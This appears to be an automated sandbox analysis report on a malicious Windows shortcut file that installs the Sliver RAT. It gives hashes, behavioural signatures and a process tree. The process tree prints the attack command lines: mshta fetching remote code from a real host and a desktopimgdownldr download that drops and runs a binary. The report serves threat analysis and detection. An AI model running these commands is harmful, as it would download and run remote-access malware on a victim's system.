Analysis
-
max time kernel
93s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
29-11-2024 04:23
Static task
static1
Behavioral task
behavioral1
Sample
f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk
Resource
win7-20241010-en
General
-
Target
f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk
-
Size
1KB
-
MD5
95bfcc2eac48c76681aa2d97a5674201
-
SHA1
f72d50b2bba6e479ec106ae2f6fe993ab6eef99a
-
SHA256
f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478
-
SHA512
952485dbd0096257ab62ef2fa684d1333fa1e495ad29d8e7a8aaa41d6b316abb48ca5ad2c1b704db7e5bc346a8350039a059c7d5ad323b072ecd3911ac4c5925
Malware Config
Extracted
https://0day.works/a
Signatures
-
Sliver RAT v2 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4956-21-0x0000000307FC0000-0x00000003090C1000-memory.dmp SliverRAT_v2 -
Sliver family
-
Blocklisted process makes network request 2 IoCs
Processes:
mshta.exeflow pid Process 6 5116 mshta.exe 8 5116 mshta.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exemshta.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
Processes:
TapiUnattend.exepid Process 2060 TapiUnattend.exe -
Drops file in Windows directory 2 IoCs
Processes:
mshta.exedescription ioc Process File created C:\Windows\Tasks\TapiUnattend.exe mshta.exe File opened for modification C:\Windows\Tasks\TapiUnattend.exe mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 1 IoCs
Processes:
TapiUnattend.exepid Process 2060 TapiUnattend.exe -
Suspicious use of WriteProcessMemory 13 IoCs
Processes:
cmd.exemshta.execmd.exeTapiUnattend.exedescription pid Process procid_target PID 1676 wrote to memory of 5116 1676 cmd.exe 84 PID 1676 wrote to memory of 5116 1676 cmd.exe 84 PID 5116 wrote to memory of 1344 5116 mshta.exe 85 PID 5116 wrote to memory of 1344 5116 mshta.exe 85 PID 1344 wrote to memory of 3416 1344 cmd.exe 87 PID 1344 wrote to memory of 3416 1344 cmd.exe 87 PID 5116 wrote to memory of 2060 5116 mshta.exe 99 PID 5116 wrote to memory of 2060 5116 mshta.exe 99 PID 2060 wrote to memory of 4956 2060 TapiUnattend.exe 100 PID 2060 wrote to memory of 4956 2060 TapiUnattend.exe 100 PID 2060 wrote to memory of 4956 2060 TapiUnattend.exe 100 PID 2060 wrote to memory of 4956 2060 TapiUnattend.exe 100 PID 2060 wrote to memory of 4956 2060 TapiUnattend.exe 100
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\f35bc7fcf73829f246b7c900600d04ceb38812f5407970daa1c5dfe1954ff478.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://0day.works/a2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c set "SYSTEMROOT=C:\Windows\Temp" && desktopimgdownldr.exe /deskimgurl:https://0day.works/null /eventName:desktopimgdownldr3⤵
- Suspicious use of WriteProcessMemory
PID:1344 -
C:\Windows\system32\desktopimgdownldr.exedesktopimgdownldr.exe /deskimgurl:https://0day.works/null /eventName:desktopimgdownldr4⤵PID:3416
-
-
-
C:\Windows\Tasks\TapiUnattend.exe"C:\Windows\Tasks\TapiUnattend.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:2060 -
C:\Windows\System32\TapiUnattend.exeC:\Windows\System32\TapiUnattend.exe4⤵PID:4956
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
15KB
MD5b574abf43dcc57a359129d1adb4cdda0
SHA16fb0f79d9a7f0108ff817ee418e3436cc51393b5
SHA2566a960edad235f685e741e0f1a74d1162fd3cf410862192236f962ae289f0886e
SHA512a82831945726b02e56a843288039d5770f926615dde410653eda33a90bdf00b5c9492dd8483d97f2798009e8f38453c3089853495e1af2a8276bba7ebce51b78